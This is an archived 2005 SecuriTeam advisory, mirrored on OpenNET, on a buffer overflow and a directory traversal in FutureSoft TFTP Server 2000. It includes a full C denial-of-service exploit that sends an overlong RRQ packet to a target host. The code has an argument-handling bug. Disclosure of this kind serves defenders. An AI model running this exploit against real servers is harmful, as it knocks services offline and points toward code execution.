The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] FutureSoft TFTP Server 2000 Buffer Overflow and Directory Traversal


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 6 Jun 2005 11:06:08 +0200
Subject: [NT] FutureSoft TFTP Server 2000 Buffer Overflow and Directory Traversal
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050606081029.D2E7C5741@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  FutureSoft TFTP Server 2000 Buffer Overflow and Directory Traversal
------------------------------------------------------------------------


SUMMARY

 <http://www.futuresoft.com/products/lit-tftp2000.htm>; FutureSoft TFTP 
"provides an Internet-standard TFTP (Trivial File Transfer Protocol) 
server on any Windows NT 4.0 PC or server. It supports all TFTP clients 
that are RFC 1350-compliant, including those integrated into network 
devices, such as routers".

Two vulnerabilities were identified in FutureSoft TFTP Server, which may 
be exploited by malicious users to execute arbitrary commands or conduct 
directory traversal attacks.

DETAILS

Vulnerable Systems:
 * FutureSoft TFTP Server 2000 version 1.0.0.1 and prior

The first flaw is due to a buffer overflow error when processing Read 
(RRQ) or Write (WRQ) requests that contain an overly long filename or 
transfer-mode string. This vulnerability may be exploited to execute 
arbitrary commands with SYSTEM privileges.

The second issue is due to an input validation error when handling 
specially crafted requests, which may be exploited by malicious users to 
conduct directory traversal attacks.

Exploit Code:
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca at icqmail
* Credit to kozan
* Usage:tftp_exp <targetIp> [targetPort]
*
*/

/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x58\x58\x58\x58" /* EIP */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
"\x69\x00";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent *pTarget;
        struct sockaddr_in sock;
        SOCKET mysocket;
        int destPORT = 69;//Default to 69

        if (argc < 2){
                printf("FutureSoft TFTP Server 2000 Remote Denial of 
Service Exploit\n");
                
printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
                printf("Bug Discovered by SIG^2 
(http://www.security.org.sg)\n");
                printf("Exploit coded By ATmaCA\n");
                printf("Web: atmacasoft.com && spyinstructors.com\n");
                printf("E-Mail: [email protected]\n");
                printf("Credit to kozan\n");
                printf("Usage:tftp_exp <targetIp> [targetPort]\n");
                return;
        }
        if (argc==3)
                destPORT=atoi(argv[2]);

        printf("Requesting Winsock...\n");
        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) {
                printf("No winsock suitable version found!");
                return;
        }
        mysocket = socket(AF_INET, SOCK_DGRAM , 0);
        if(mysocket==INVALID_SOCKET){
                printf("Can't create UDP socket\n");
                exit(1);
        }
        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(argv[2])) == NULL){
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }
        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(destPORT);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) 
))){
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        Sleep(10);

        printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));
        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
                printf("Error sending packet\n");
                closesocket(mysocket);
                exit(1);
        }
        printf("Packet sent........\n");
        printf("Success.\n");

        closesocket(mysocket);
        WSACleanup();
}


ADDITIONAL INFORMATION

The exploit code was supplied by:  <mailto:atmaca@icqmail.com.> ATmaCA.
The original article can be found at:  
<http://www.security.org.sg/vuln/tftp2000-1001.html>; 
http://www.security.org.sg/vuln/tftp2000-1001.html







This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] 
In order to subscribe to the mailing list, simply forward this email to: [email protected] 







DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру